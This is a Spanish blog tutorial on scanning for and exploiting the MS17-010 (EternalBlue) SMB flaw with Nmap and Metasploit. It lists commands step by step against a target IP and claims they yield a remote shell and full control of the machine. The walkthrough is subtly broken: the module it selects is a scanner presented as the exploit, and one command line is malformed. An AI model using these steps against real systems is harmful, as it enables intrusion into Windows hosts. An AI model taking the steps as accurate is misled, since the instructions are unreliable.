Detectar vulnerabilidad MS17-010 EternalBlue y explotarla.
En el mes de mayo del año 2017 se detecto un Rasomware llamado WannaCry, este malware se aprovechaba de la vulnerabilidad EternalBlue para propagarse por las redes conectadas a los equipos relacionados a nivel interno, la causa de su gran impacto se debe principalmente a la existencia de esa brecha en todos los dispositivos windows y el parche no fue liberado horas después de identificar la vulnerabilidad, hoy vamos a detectar si un equipo es vulnerable y demostrar lo sencillo que es aprovecharse de esta vulnerabilidad.
1 – Procedemos a dirigirnos a la ruta donde Nmap almacena los scripts para posteriormente descargar el .nse liberado para detectar la existencia de esta vulnerabilidad.
Url Fuente: https://svn.nmap.org/nmap/scripts/smb-vuln-ms17-010.nse
cd /usr/share/nmap/scripts && wget https://svn.nmap.org/nmap/scripts/smb-vuln-ms17-010.nse
2 – Ejecutamos el Nmap invocando a el script para detectar si el objetivo en cuestión es vulnerable o no.
nmap -p445 --script smb-vuln-ms17-010 <IP>
3 – Ahora que sabemos que nuestro objetivo es vulnerable procedemos a ejecutar nuestro Metasploit para ejecutar el ataque.
msfconsole
4 – Buscamos el exploit de la librería de Metaspploit.
search ms17_010
5 – Seleccionamos el exploit a utilizar y adicional revisamos su opciones de configuración.
use auxiliary/scanner/smb/smb_ms17_010 options
6 – En este caso especifico solo vamos a modificar la opción RHOST y procederemos con la explotación.
set RHOST <IP>
7 – Después de tener nuestras opciones definidas y todo en orden procedemos con la explotación!.
exploit
8 – Podemos ver que la explotación se realizo de manera correcta y pudimos obtener una shell en el equipo remoto pudiendo comprometer la totalidad del equipo
De esta manera podemos identificar el alcance que puede tener este ataque y parte de las consecuencias, la solución es tan sencilla como aplicar el parche liberado por Microsoft para cerrar esta vulnerabilidad, recuerda utilizar esta información de manera responsable, Happy Hacking.
Saludos!Social
0x00Sector!
Por favor, publicar con más frecuencia, ya que realmente me
encanta su página de sitio de blogs. Gracias!